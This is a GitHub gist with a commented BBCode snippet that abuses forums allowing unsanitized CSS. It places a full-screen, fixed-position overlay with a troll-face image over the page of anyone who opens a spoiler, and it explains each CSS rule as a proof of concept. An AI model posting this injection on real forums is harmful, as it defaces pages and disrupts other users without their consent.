Skip to content

Instantly share code, notes, and snippets.

@easyaspi314
Last active December 21, 2017 20:45
Show Gist options
  • Save easyaspi314/8ddfb3c8f37a25f46e90a3d41d2e8383 to your computer and use it in GitHub Desktop.
Save easyaspi314/8ddfb3c8f37a25f46e90a3d41d2e8383 to your computer and use it in GitHub Desktop.
How to break Pokécommunity (and other BBCode forums which allow CSS)
Click and be trolled by the power of unsanitized CSS!
<!--
This shows a troll face that completely covers the screen when you unhide the spoiler.
**** This is mainly a proof of concept; if you actually post this, don't be surprised if mods get angry! ****
Basically, some BBCode-based forums have a [div][/div] or [style][/style] tag which allows custom CSS.
This takes full advantage of that and CSS's position: fixed, which positions the element in relation to the
browser window, not the parent element.
This allows you to place literally anything anywhere on the browser screen. It is used commonly for the headers
that stay on the top of the page or the banner ads that show up on the bottom of your phone's screen.
NOTE: Some forums use hide instead of spoiler, replace spoiler with hide if needed. Same goes with div and style.
-->
[spoiler]
<!--
BBCode puts <br /> when you put a new line in.
By putting a semicolon on the end of the line, we keep the browser
from mixing this syntax error with actual CSS rules.
-->
[div="
; /* Make it ignore the post boundaries. */
; /* This puts this div relative to the browser window */
; /* This is the truly evil part. */
; position: fixed;
;
; /* Position it so it completely covers the page. */
; /* top: 0; and left: 0; put it in the corner of the page */
; /* vw and vh represent the width and height of the browser window. */
; top: 0; left:0; width: 100vw; height: 100vh;
;
; /* Near-white background to hide everything. */
; background: rgba(255, 255, 255, 0.75);
;
; /* Don't be 100% evil.*/
; /* Allow the user to hide it by being able to click through.*/
; pointer-events:none; /*
;
; /* Make it cover everything. */
; z-index: 99999;
;"]
[center]
<!-- Now for our troll face image. :) -->
[img]http://vignette2.wikia.nocookie.net/roblox/images/3/38/Transparent_Troll_Face.png/revision/latest?cb=20120713214853[/IMG]
[color="green"][size="4"][b]>tfw trolled with css[/b][/size][/color]
[div="pointer-events:auto;"][url="https://gist.github.com/easyaspi314/8ddfb3c8f37a25f46e90a3d41d2e8383"][span="text-decoration:none!important;background:dodgerblue;padding:8px;color:white;font-weight: bold;"]Fork me on GitHub![/span][/url][/div]
[/center][/div][/spoiler]
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment